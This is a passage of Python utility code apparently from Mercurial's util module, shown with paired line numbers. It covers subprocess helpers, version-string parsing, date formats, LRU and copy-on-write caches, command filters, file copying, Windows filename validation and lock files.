420 420 # if the file is empty, and if so, return an empty buffer.
421 421 if os.fstat(fd).st_size == 0:
422 422 return ''
423 423 raise
424 424
425 425 def popen2(cmd, env=None, newlines=False):
426 426 # Setting bufsize to -1 lets the system decide the buffer size.
427 427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 430 close_fds=closefds,
431 431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 432 universal_newlines=newlines,
433 433 env=env)
434 434 return p.stdin, p.stdout
435 435
436 436 def popen3(cmd, env=None, newlines=False):
437 437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 438 return stdin, stdout, stderr
439 439
440 440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 442 close_fds=closefds,
443 443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 444 stderr=subprocess.PIPE,
445 445 universal_newlines=newlines,
446 446 env=env)
447 447 return p.stdin, p.stdout, p.stderr, p
448 448
449 449 def version():
450 450 """Return version information if available."""
451 451 try:
452 452 from . import __version__
453 453 return __version__.version
454 454 except ImportError:
455 455 return 'unknown'
456 456
457 457 def versiontuple(v=None, n=4):
458 458 """Parses a Mercurial version string into an N-tuple.
459 459
460 460 The version string to be parsed is specified with the ``v`` argument.
461 461 If it isn't defined, the current Mercurial version string will be parsed.
462 462
463 463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 464 returned values:
465 465
466 466 >>> v = b'3.6.1+190-df9b73d2d444'
467 467 >>> versiontuple(v, 2)
468 468 (3, 6)
469 469 >>> versiontuple(v, 3)
470 470 (3, 6, 1)
471 471 >>> versiontuple(v, 4)
472 472 (3, 6, 1, '190-df9b73d2d444')
473 473
474 474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 475 (3, 6, 1, '190-df9b73d2d444+20151118')
476 476
477 477 >>> v = b'3.6'
478 478 >>> versiontuple(v, 2)
479 479 (3, 6)
480 480 >>> versiontuple(v, 3)
481 481 (3, 6, None)
482 482 >>> versiontuple(v, 4)
483 483 (3, 6, None, None)
484 484
485 485 >>> v = b'3.9-rc'
486 486 >>> versiontuple(v, 2)
487 487 (3, 9)
488 488 >>> versiontuple(v, 3)
489 489 (3, 9, None)
490 490 >>> versiontuple(v, 4)
491 491 (3, 9, None, 'rc')
492 492
493 493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 494 >>> versiontuple(v, 2)
495 495 (3, 9)
496 496 >>> versiontuple(v, 3)
497 497 (3, 9, None)
498 498 >>> versiontuple(v, 4)
499 499 (3, 9, None, 'rc+2-02a8fea4289b')
500 500 """
501 501 if not v:
502 502 v = version()
503 503 parts = remod.split('[\+-]', v, 1)
504 504 if len(parts) == 1:
505 505 vparts, extra = parts[0], None
506 506 else:
507 507 vparts, extra = parts
508 508
509 509 vints = []
510 510 for i in vparts.split('.'):
511 511 try:
512 512 vints.append(int(i))
513 513 except ValueError:
514 514 break
515 515 # (3, 6) -> (3, 6, None)
516 516 while len(vints) < 3:
517 517 vints.append(None)
518 518
519 519 if n == 2:
520 520 return (vints[0], vints[1])
521 521 if n == 3:
522 522 return (vints[0], vints[1], vints[2])
523 523 if n == 4:
524 524 return (vints[0], vints[1], vints[2], extra)
525 525
526 526 # used by parsedate
527 527 defaultdateformats = (
528 528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 529 '%Y-%m-%dT%H:%M', # without seconds
530 530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 531 '%Y-%m-%dT%H%M', # without seconds
532 532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 533 '%Y-%m-%d %H:%M', # without seconds
534 534 '%Y-%m-%d %H%M%S', # without :
535 535 '%Y-%m-%d %H%M', # without seconds
536 536 '%Y-%m-%d %I:%M:%S%p',
537 537 '%Y-%m-%d %H:%M',
538 538 '%Y-%m-%d %I:%M%p',
539 539 '%Y-%m-%d',
540 540 '%m-%d',
541 541 '%m/%d',
542 542 '%m/%d/%y',
543 543 '%m/%d/%Y',
544 544 '%a %b %d %H:%M:%S %Y',
545 545 '%a %b %d %I:%M:%S%p %Y',
546 546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 547 '%b %d %H:%M:%S %Y',
548 548 '%b %d %I:%M:%S%p %Y',
549 549 '%b %d %H:%M:%S',
550 550 '%b %d %I:%M:%S%p',
551 551 '%b %d %H:%M',
552 552 '%b %d %I:%M%p',
553 553 '%b %d %Y',
554 554 '%b %d',
555 555 '%H:%M:%S',
556 556 '%I:%M:%S%p',
557 557 '%H:%M',
558 558 '%I:%M%p',
559 559 )
560 560
561 561 extendeddateformats = defaultdateformats + (
562 562 "%Y",
563 563 "%Y-%m",
564 564 "%b",
565 565 "%b %Y",
566 566 )
567 567
568 568 def cachefunc(func):
569 569 '''cache the result of function calls'''
570 570 # XXX doesn't handle keywords args
571 571 if func.__code__.co_argcount == 0:
572 572 cache = []
573 573 def f():
574 574 if len(cache) == 0:
575 575 cache.append(func())
576 576 return cache[0]
577 577 return f
578 578 cache = {}
579 579 if func.__code__.co_argcount == 1:
580 580 # we gain a small amount of time because
581 581 # we don't need to pack/unpack the list
582 582 def f(arg):
583 583 if arg not in cache:
584 584 cache[arg] = func(arg)
585 585 return cache[arg]
586 586 else:
587 587 def f(*args):
588 588 if args not in cache:
589 589 cache[args] = func(*args)
590 590 return cache[args]
591 591
592 592 return f
593 593
594 594 class cow(object):
595 595 """helper class to make copy-on-write easier
596 596
597 597 Call preparewrite before doing any writes.
598 598 """
599 599
600 600 def preparewrite(self):
601 601 """call this before writes, return self or a copied new object"""
602 602 if getattr(self, '_copied', 0):
603 603 self._copied -= 1
604 604 return self.__class__(self)
605 605 return self
606 606
607 607 def copy(self):
608 608 """always do a cheap copy"""
609 609 self._copied = getattr(self, '_copied', 0) + 1
610 610 return self
611 611
612 612 class sortdict(collections.OrderedDict):
613 613 '''a simple sorted dictionary
614 614
615 615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 616 >>> d2 = d1.copy()
617 617 >>> d2
618 618 sortdict([('a', 0), ('b', 1)])
619 619 >>> d2.update([(b'a', 2)])
620 620 >>> list(d2.keys()) # should still be in last-set order
621 621 ['b', 'a']
622 622 '''
623 623
624 624 def __setitem__(self, key, value):
625 625 if key in self:
626 626 del self[key]
627 627 super(sortdict, self).__setitem__(key, value)
628 628
629 629 if pycompat.ispypy:
630 630 # __setitem__() isn't called as of PyPy 5.8.0
631 631 def update(self, src):
632 632 if isinstance(src, dict):
633 633 src = src.iteritems()
634 634 for k, v in src:
635 635 self[k] = v
636 636
637 637 class cowdict(cow, dict):
638 638 """copy-on-write dict
639 639
640 640 Be sure to call d = d.preparewrite() before writing to d.
641 641
642 642 >>> a = cowdict()
643 643 >>> a is a.preparewrite()
644 644 True
645 645 >>> b = a.copy()
646 646 >>> b is a
647 647 True
648 648 >>> c = b.copy()
649 649 >>> c is a
650 650 True
651 651 >>> a = a.preparewrite()
652 652 >>> b is a
653 653 False
654 654 >>> a is a.preparewrite()
655 655 True
656 656 >>> c = c.preparewrite()
657 657 >>> b is c
658 658 False
659 659 >>> b is b.preparewrite()
660 660 True
661 661 """
662 662
663 663 class cowsortdict(cow, sortdict):
664 664 """copy-on-write sortdict
665 665
666 666 Be sure to call d = d.preparewrite() before writing to d.
667 667 """
668 668
669 669 class transactional(object):
670 670 """Base class for making a transactional type into a context manager."""
671 671 __metaclass__ = abc.ABCMeta
672 672
673 673 @abc.abstractmethod
674 674 def close(self):
675 675 """Successfully closes the transaction."""
676 676
677 677 @abc.abstractmethod
678 678 def release(self):
679 679 """Marks the end of the transaction.
680 680
681 681 If the transaction has not been closed, it will be aborted.
682 682 """
683 683
684 684 def __enter__(self):
685 685 return self
686 686
687 687 def __exit__(self, exc_type, exc_val, exc_tb):
688 688 try:
689 689 if exc_type is None:
690 690 self.close()
691 691 finally:
692 692 self.release()
693 693
694 694 @contextlib.contextmanager
695 695 def acceptintervention(tr=None):
696 696 """A context manager that closes the transaction on InterventionRequired
697 697
698 698 If no transaction was provided, this simply runs the body and returns
699 699 """
700 700 if not tr:
701 701 yield
702 702 return
703 703 try:
704 704 yield
705 705 tr.close()
706 706 except error.InterventionRequired:
707 707 tr.close()
708 708 raise
709 709 finally:
710 710 tr.release()
711 711
712 712 @contextlib.contextmanager
713 713 def nullcontextmanager():
714 714 yield
715 715
716 716 class _lrucachenode(object):
717 717 """A node in a doubly linked list.
718 718
719 719 Holds a reference to nodes on either side as well as a key-value
720 720 pair for the dictionary entry.
721 721 """
722 722 __slots__ = (u'next', u'prev', u'key', u'value')
723 723
724 724 def __init__(self):
725 725 self.next = None
726 726 self.prev = None
727 727
728 728 self.key = _notset
729 729 self.value = None
730 730
731 731 def markempty(self):
732 732 """Mark the node as emptied."""
733 733 self.key = _notset
734 734
735 735 class lrucachedict(object):
736 736 """Dict that caches most recent accesses and sets.
737 737
738 738 The dict consists of an actual backing dict - indexed by original
739 739 key - and a doubly linked circular list defining the order of entries in
740 740 the cache.
741 741
742 742 The head node is the newest entry in the cache. If the cache is full,
743 743 we recycle head.prev and make it the new head. Cache accesses result in
744 744 the node being moved to before the existing head and being marked as the
745 745 new head node.
746 746 """
747 747 def __init__(self, max):
748 748 self._cache = {}
749 749
750 750 self._head = head = _lrucachenode()
751 751 head.prev = head
752 752 head.next = head
753 753 self._size = 1
754 754 self._capacity = max
755 755
756 756 def __len__(self):
757 757 return len(self._cache)
758 758
759 759 def __contains__(self, k):
760 760 return k in self._cache
761 761
762 762 def __iter__(self):
763 763 # We don't have to iterate in cache order, but why not.
764 764 n = self._head
765 765 for i in range(len(self._cache)):
766 766 yield n.key
767 767 n = n.next
768 768
769 769 def __getitem__(self, k):
770 770 node = self._cache[k]
771 771 self._movetohead(node)
772 772 return node.value
773 773
774 774 def __setitem__(self, k, v):
775 775 node = self._cache.get(k)
776 776 # Replace existing value and mark as newest.
777 777 if node is not None:
778 778 node.value = v
779 779 self._movetohead(node)
780 780 return
781 781
782 782 if self._size < self._capacity:
783 783 node = self._addcapacity()
784 784 else:
785 785 # Grab the last/oldest item.
786 786 node = self._head.prev
787 787
788 788 # At capacity. Kill the old entry.
789 789 if node.key is not _notset:
790 790 del self._cache[node.key]
791 791
792 792 node.key = k
793 793 node.value = v
794 794 self._cache[k] = node
795 795 # And mark it as newest entry. No need to adjust order since it
796 796 # is already self._head.prev.
797 797 self._head = node
798 798
799 799 def __delitem__(self, k):
800 800 node = self._cache.pop(k)
801 801 node.markempty()
802 802
803 803 # Temporarily mark as newest item before re-adjusting head to make
804 804 # this node the oldest item.
805 805 self._movetohead(node)
806 806 self._head = node.next
807 807
808 808 # Additional dict methods.
809 809
810 810 def get(self, k, default=None):
811 811 try:
812 812 return self._cache[k].value
813 813 except KeyError:
814 814 return default
815 815
816 816 def clear(self):
817 817 n = self._head
818 818 while n.key is not _notset:
819 819 n.markempty()
820 820 n = n.next
821 821
822 822 self._cache.clear()
823 823
824 824 def copy(self):
825 825 result = lrucachedict(self._capacity)
826 826 n = self._head.prev
827 827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 828 for i in range(len(self._cache)):
829 829 result[n.key] = n.value
830 830 n = n.prev
831 831 return result
832 832
833 833 def _movetohead(self, node):
834 834 """Mark a node as the newest, making it the new head.
835 835
836 836 When a node is accessed, it becomes the freshest entry in the LRU
837 837 list, which is denoted by self._head.
838 838
839 839 Visually, let's make ``N`` the new head node (* denotes head):
840 840
841 841 previous/oldest <-> head <-> next/next newest
842 842
843 843 ----<->--- A* ---<->-----
844 844 | |
845 845 E <-> D <-> N <-> C <-> B
846 846
847 847 To:
848 848
849 849 ----<->--- N* ---<->-----
850 850 | |
851 851 E <-> D <-> C <-> B <-> A
852 852
853 853 This requires the following moves:
854 854
855 855 C.next = D (node.prev.next = node.next)
856 856 D.prev = C (node.next.prev = node.prev)
857 857 E.next = N (head.prev.next = node)
858 858 N.prev = E (node.prev = head.prev)
859 859 N.next = A (node.next = head)
860 860 A.prev = N (head.prev = node)
861 861 """
862 862 head = self._head
863 863 # C.next = D
864 864 node.prev.next = node.next
865 865 # D.prev = C
866 866 node.next.prev = node.prev
867 867 # N.prev = E
868 868 node.prev = head.prev
869 869 # N.next = A
870 870 # It is tempting to do just "head" here, however if node is
871 871 # adjacent to head, this will do bad things.
872 872 node.next = head.prev.next
873 873 # E.next = N
874 874 node.next.prev = node
875 875 # A.prev = N
876 876 node.prev.next = node
877 877
878 878 self._head = node
879 879
880 880 def _addcapacity(self):
881 881 """Add a node to the circular linked list.
882 882
883 883 The new node is inserted before the head node.
884 884 """
885 885 head = self._head
886 886 node = _lrucachenode()
887 887 head.prev.next = node
888 888 node.prev = head.prev
889 889 node.next = head
890 890 head.prev = node
891 891 self._size += 1
892 892 return node
893 893
894 894 def lrucachefunc(func):
895 895 '''cache most recent results of function calls'''
896 896 cache = {}
897 897 order = collections.deque()
898 898 if func.__code__.co_argcount == 1:
899 899 def f(arg):
900 900 if arg not in cache:
901 901 if len(cache) > 20:
902 902 del cache[order.popleft()]
903 903 cache[arg] = func(arg)
904 904 else:
905 905 order.remove(arg)
906 906 order.append(arg)
907 907 return cache[arg]
908 908 else:
909 909 def f(*args):
910 910 if args not in cache:
911 911 if len(cache) > 20:
912 912 del cache[order.popleft()]
913 913 cache[args] = func(*args)
914 914 else:
915 915 order.remove(args)
916 916 order.append(args)
917 917 return cache[args]
918 918
919 919 return f
920 920
921 921 class propertycache(object):
922 922 def __init__(self, func):
923 923 self.func = func
924 924 self.name = func.__name__
925 925 def __get__(self, obj, type=None):
926 926 result = self.func(obj)
927 927 self.cachevalue(obj, result)
928 928 return result
929 929
930 930 def cachevalue(self, obj, value):
931 931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 932 obj.__dict__[self.name] = value
933 933
934 934 def pipefilter(s, cmd):
935 935 '''filter string S through command CMD, returning its output'''
936 936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 938 pout, perr = p.communicate(s)
939 939 return pout
940 940
941 941 def tempfilter(s, cmd):
942 942 '''filter string S through a pair of temporary files with CMD.
943 943 CMD is used as a template to create the real command to be run,
944 944 with the strings INFILE and OUTFILE replaced by the real names of
945 945 the temporary files generated.'''
946 946 inname, outname = None, None
947 947 try:
948 948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 950 fp.write(s)
951 951 fp.close()
952 952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 953 os.close(outfd)
954 954 cmd = cmd.replace('INFILE', inname)
955 955 cmd = cmd.replace('OUTFILE', outname)
956 956 code = os.system(cmd)
957 957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 958 code = 0
959 959 if code:
960 960 raise Abort(_("command '%s' failed: %s") %
961 961 (cmd, explainexit(code)))
962 962 return readfile(outname)
963 963 finally:
964 964 try:
965 965 if inname:
966 966 os.unlink(inname)
967 967 except OSError:
968 968 pass
969 969 try:
970 970 if outname:
971 971 os.unlink(outname)
972 972 except OSError:
973 973 pass
974 974
975 975 filtertable = {
976 976 'tempfile:': tempfilter,
977 977 'pipe:': pipefilter,
978 978 }
979 979
980 980 def filter(s, cmd):
981 981 "filter a string through a command that transforms its input to its output"
982 982 for name, fn in filtertable.iteritems():
983 983 if cmd.startswith(name):
984 984 return fn(s, cmd[len(name):].lstrip())
985 985 return pipefilter(s, cmd)
986 986
987 987 def binary(s):
988 988 """return true if a string is binary data"""
989 989 return bool(s and '\0' in s)
990 990
991 991 def increasingchunks(source, min=1024, max=65536):
992 992 '''return no less than min bytes per chunk while data remains,
993 993 doubling min after each chunk until it reaches max'''
994 994 def log2(x):
995 995 if not x:
996 996 return 0
997 997 i = 0
998 998 while x:
999 999 x >>= 1
1000 1000 i += 1
1001 1001 return i - 1
1002 1002
1003 1003 buf = []
1004 1004 blen = 0
1005 1005 for chunk in source:
1006 1006 buf.append(chunk)
1007 1007 blen += len(chunk)
1008 1008 if blen >= min:
1009 1009 if min < max:
1010 1010 min = min << 1
1011 1011 nmin = 1 << log2(blen)
1012 1012 if nmin > min:
1013 1013 min = nmin
1014 1014 if min > max:
1015 1015 min = max
1016 1016 yield ''.join(buf)
1017 1017 blen = 0
1018 1018 buf = []
1019 1019 if buf:
1020 1020 yield ''.join(buf)
1021 1021
1022 1022 Abort = error.Abort
1023 1023
1024 1024 def always(fn):
1025 1025 return True
1026 1026
1027 1027 def never(fn):
1028 1028 return False
1029 1029
1030 1030 def nogc(func):
1031 1031 """disable garbage collector
1032 1032
1033 1033 Python's garbage collector triggers a GC each time a certain number of
1034 1034 container objects (the number being defined by gc.get_threshold()) are
1035 1035 allocated even when marked not to be tracked by the collector. Tracking has
1036 1036 no effect on when GCs are triggered, only on what objects the GC looks
1037 1037 into. As a workaround, disable GC while building complex (huge)
1038 1038 containers.
1039 1039
1040 1040 This garbage collector issue have been fixed in 2.7. But it still affect
1041 1041 CPython's performance.
1042 1042 """
1043 1043 def wrapper(*args, **kwargs):
1044 1044 gcenabled = gc.isenabled()
1045 1045 gc.disable()
1046 1046 try:
1047 1047 return func(*args, **kwargs)
1048 1048 finally:
1049 1049 if gcenabled:
1050 1050 gc.enable()
1051 1051 return wrapper
1052 1052
1053 1053 if pycompat.ispypy:
1054 1054 # PyPy runs slower with gc disabled
1055 1055 nogc = lambda x: x
1056 1056
1057 1057 def pathto(root, n1, n2):
1058 1058 '''return the relative path from one place to another.
1059 1059 root should use os.sep to separate directories
1060 1060 n1 should use os.sep to separate directories
1061 1061 n2 should use "/" to separate directories
1062 1062 returns an os.sep-separated path.
1063 1063
1064 1064 If n1 is a relative path, it's assumed it's
1065 1065 relative to root.
1066 1066 n2 should always be relative to root.
1067 1067 '''
1068 1068 if not n1:
1069 1069 return localpath(n2)
1070 1070 if os.path.isabs(n1):
1071 1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 1072 return os.path.join(root, localpath(n2))
1073 1073 n2 = '/'.join((pconvert(root), n2))
1074 1074 a, b = splitpath(n1), n2.split('/')
1075 1075 a.reverse()
1076 1076 b.reverse()
1077 1077 while a and b and a[-1] == b[-1]:
1078 1078 a.pop()
1079 1079 b.pop()
1080 1080 b.reverse()
1081 1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082 1082
1083 1083 def mainfrozen():
1084 1084 """return True if we are a frozen executable.
1085 1085
1086 1086 The code supports py2exe (most common, Windows only) and tools/freeze
1087 1087 (portable, not much used).
1088 1088 """
1089 1089 return (safehasattr(sys, "frozen") or # new py2exe
1090 1090 safehasattr(sys, "importers") or # old py2exe
1091 1091 imp.is_frozen(u"__main__")) # tools/freeze
1092 1092
1093 1093 # the location of data files matching the source code
1094 1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 1095 # executable version (py2exe) doesn't support __file__
1096 1096 datapath = os.path.dirname(pycompat.sysexecutable)
1097 1097 else:
1098 1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099 1099
1100 1100 i18n.setdatapath(datapath)
1101 1101
1102 1102 _hgexecutable = None
1103 1103
1104 1104 def hgexecutable():
1105 1105 """return location of the 'hg' executable.
1106 1106
1107 1107 Defaults to $HG or 'hg' in the search path.
1108 1108 """
1109 1109 if _hgexecutable is None:
1110 1110 hg = encoding.environ.get('HG')
1111 1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 1112 if hg:
1113 1113 _sethgexecutable(hg)
1114 1114 elif mainfrozen():
1115 1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 1116 # Env variable set by py2app
1117 1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 1118 else:
1119 1119 _sethgexecutable(pycompat.sysexecutable)
1120 1120 elif (os.path.basename(
1121 1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 1123 else:
1124 1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 1125 _sethgexecutable(exe)
1126 1126 return _hgexecutable
1127 1127
1128 1128 def _sethgexecutable(path):
1129 1129 """set location of the 'hg' executable"""
1130 1130 global _hgexecutable
1131 1131 _hgexecutable = path
1132 1132
1133 1133 def _isstdout(f):
1134 1134 fileno = getattr(f, 'fileno', None)
1135 1135 return fileno and fileno() == sys.__stdout__.fileno()
1136 1136
1137 1137 def shellenviron(environ=None):
1138 1138 """return environ with optional override, useful for shelling out"""
1139 1139 def py2shell(val):
1140 1140 'convert python object into string that is useful to shell'
1141 1141 if val is None or val is False:
1142 1142 return '0'
1143 1143 if val is True:
1144 1144 return '1'
1145 1145 return str(val)
1146 1146 env = dict(encoding.environ)
1147 1147 if environ:
1148 1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 1149 env['HG'] = hgexecutable()
1150 1150 return env
1151 1151
1152 1152 def system(cmd, environ=None, cwd=None, out=None):
1153 1153 '''enhanced shell command execution.
1154 1154 run with environment maybe modified, maybe in different dir.
1155 1155
1156 1156 if out is specified, it is assumed to be a file-like object that has a
1157 1157 write() method. stdout and stderr will be redirected to out.'''
1158 1158 try:
1159 1159 stdout.flush()
1160 1160 except Exception:
1161 1161 pass
1162 1162 cmd = quotecommand(cmd)
1163 1163 env = shellenviron(environ)
1164 1164 if out is None or _isstdout(out):
1165 1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 1166 env=env, cwd=cwd)
1167 1167 else:
1168 1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 1170 stderr=subprocess.STDOUT)
1171 1171 for line in iter(proc.stdout.readline, ''):
1172 1172 out.write(line)
1173 1173 proc.wait()
1174 1174 rc = proc.returncode
1175 1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 1176 rc = 0
1177 1177 return rc
1178 1178
1179 1179 def checksignature(func):
1180 1180 '''wrap a function with code to check for calling errors'''
1181 1181 def check(*args, **kwargs):
1182 1182 try:
1183 1183 return func(*args, **kwargs)
1184 1184 except TypeError:
1185 1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 1186 raise error.SignatureError
1187 1187 raise
1188 1188
1189 1189 return check
1190 1190
1191 1191 # a whilelist of known filesystems where hardlink works reliably
1192 1192 _hardlinkfswhitelist = {
1193 1193 'btrfs',
1194 1194 'ext2',
1195 1195 'ext3',
1196 1196 'ext4',
1197 1197 'hfs',
1198 1198 'jfs',
1199 1199 'reiserfs',
1200 1200 'tmpfs',
1201 1201 'ufs',
1202 1202 'xfs',
1203 1203 'zfs',
1204 1204 }
1205 1205
1206 1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 1207 '''copy a file, preserving mode and optionally other stat info like
1208 1208 atime/mtime
1209 1209
1210 1210 checkambig argument is used with filestat, and is useful only if
1211 1211 destination file is guarded by any lock (e.g. repo.lock or
1212 1212 repo.wlock).
1213 1213
1214 1214 copystat and checkambig should be exclusive.
1215 1215 '''
1216 1216 assert not (copystat and checkambig)
1217 1217 oldstat = None
1218 1218 if os.path.lexists(dest):
1219 1219 if checkambig:
1220 1220 oldstat = checkambig and filestat.frompath(dest)
1221 1221 unlink(dest)
1222 1222 if hardlink:
1223 1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 1224 # unless we are confident that dest is on a whitelisted filesystem.
1225 1225 try:
1226 1226 fstype = getfstype(os.path.dirname(dest))
1227 1227 except OSError:
1228 1228 fstype = None
1229 1229 if fstype not in _hardlinkfswhitelist:
1230 1230 hardlink = False
1231 1231 if hardlink:
1232 1232 try:
1233 1233 oslink(src, dest)
1234 1234 return
1235 1235 except (IOError, OSError):
1236 1236 pass # fall back to normal copy
1237 1237 if os.path.islink(src):
1238 1238 os.symlink(os.readlink(src), dest)
1239 1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 1240 # for them anyway
1241 1241 else:
1242 1242 try:
1243 1243 shutil.copyfile(src, dest)
1244 1244 if copystat:
1245 1245 # copystat also copies mode
1246 1246 shutil.copystat(src, dest)
1247 1247 else:
1248 1248 shutil.copymode(src, dest)
1249 1249 if oldstat and oldstat.stat:
1250 1250 newstat = filestat.frompath(dest)
1251 1251 if newstat.isambig(oldstat):
1252 1252 # stat of copied file is ambiguous to original one
1253 1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 1254 os.utime(dest, (advanced, advanced))
1255 1255 except shutil.Error as inst:
1256 1256 raise Abort(str(inst))
1257 1257
1258 1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 1259 """Copy a directory tree using hardlinks if possible."""
1260 1260 num = 0
1261 1261
1262 1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1263 1263
1264 1264 if os.path.isdir(src):
1265 1265 if hardlink is None:
1266 1266 hardlink = (os.stat(src).st_dev ==
1267 1267 os.stat(os.path.dirname(dst)).st_dev)
1268 1268 topic = gettopic()
1269 1269 os.mkdir(dst)
1270 1270 for name, kind in listdir(src):
1271 1271 srcname = os.path.join(src, name)
1272 1272 dstname = os.path.join(dst, name)
1273 1273 def nprog(t, pos):
1274 1274 if pos is not None:
1275 1275 return progress(t, pos + num)
1276 1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 1277 num += n
1278 1278 else:
1279 1279 if hardlink is None:
1280 1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 1281 os.stat(os.path.dirname(dst)).st_dev)
1282 1282 topic = gettopic()
1283 1283
1284 1284 if hardlink:
1285 1285 try:
1286 1286 oslink(src, dst)
1287 1287 except (IOError, OSError):
1288 1288 hardlink = False
1289 1289 shutil.copy(src, dst)
1290 1290 else:
1291 1291 shutil.copy(src, dst)
1292 1292 num += 1
1293 1293 progress(topic, num)
1294 1294 progress(topic, None)
1295 1295
1296 1296 return hardlink, num
1297 1297
1298 1298 _winreservednames = {
1299 1299 'con', 'prn', 'aux', 'nul',
1300 1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 1302 }
1303 1303 _winreservedchars = ':*?"<>|'
1304 1304 def checkwinfilename(path):
1305 1305 r'''Check that the base-relative path is a valid filename on Windows.
1306 1306 Returns None if the path is ok, or a UI string describing the problem.
1307 1307
1308 1308 >>> checkwinfilename(b"just/a/normal/path")
1309 1309 >>> checkwinfilename(b"foo/bar/con.xml")
1310 1310 "filename contains 'con', which is reserved on Windows"
1311 1311 >>> checkwinfilename(b"foo/con.xml/bar")
1312 1312 "filename contains 'con', which is reserved on Windows"
1313 1313 >>> checkwinfilename(b"foo/bar/xml.con")
1314 1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 1315 "filename contains 'AUX', which is reserved on Windows"
1316 1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 1317 "filename contains ':', which is reserved on Windows"
1318 1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 1319 "filename contains '\\x07', which is invalid on Windows"
1320 1320 >>> checkwinfilename(b"foo/bar/bla ")
1321 1321 "filename ends with ' ', which is not allowed on Windows"
1322 1322 >>> checkwinfilename(b"../bar")
1323 1323 >>> checkwinfilename(b"foo\\")
1324 1324 "filename ends with '\\', which is invalid on Windows"
1325 1325 >>> checkwinfilename(b"foo\\/bar")
1326 1326 "directory name ends with '\\', which is invalid on Windows"
1327 1327 '''
1328 1328 if path.endswith('\\'):
1329 1329 return _("filename ends with '\\', which is invalid on Windows")
1330 1330 if '\\/' in path:
1331 1331 return _("directory name ends with '\\', which is invalid on Windows")
1332 1332 for n in path.replace('\\', '/').split('/'):
1333 1333 if not n:
1334 1334 continue
1335 1335 for c in _filenamebytestr(n):
1336 1336 if c in _winreservedchars:
1337 1337 return _("filename contains '%s', which is reserved "
1338 1338 "on Windows") % c
1339 1339 if ord(c) <= 31:
1340 1340 return _("filename contains '%s', which is invalid "
1341 1341 "on Windows") % escapestr(c)
1342 1342 base = n.split('.')[0]
1343 1343 if base and base.lower() in _winreservednames:
1344 1344 return _("filename contains '%s', which is reserved "
1345 1345 "on Windows") % base
1346 1346 t = n[-1:]
1347 1347 if t in '. ' and n not in '..':
1348 1348 return _("filename ends with '%s', which is not allowed "
1349 1349 "on Windows") % t
1350 1350
1351 1351 if pycompat.iswindows:
1352 1352 checkosfilename = checkwinfilename
1353 1353 timer = time.clock
1354 1354 else:
1355 1355 checkosfilename = platform.checkosfilename
1356 1356 timer = time.time
1357 1357
1358 1358 if safehasattr(time, "perf_counter"):
1359 1359 timer = time.perf_counter
1360 1360
1361 1361 def makelock(info, pathname):
1362 1362 try:
1363 1363 return os.symlink(info, pathname)
1364 1364 except OSError as why:
1365 1365 if why.errno == errno.EEXIST:
1366 1366 raise
1367 1367 except AttributeError: # no symlink in os
1368 1368 pass
1369 1369
1370 1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 1371 os.write(ld, info)
1372 1372 os.close(ld)
1373 1373
1374 1374 def readlock(pathname):
1375 1375 try:
1376 1376 return os.readlink(pathname)
1377 1377 except OSError as why:
1378 1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 1379 raise
1380 1380 except AttributeError: # no symlink in os
1381 1381 pass
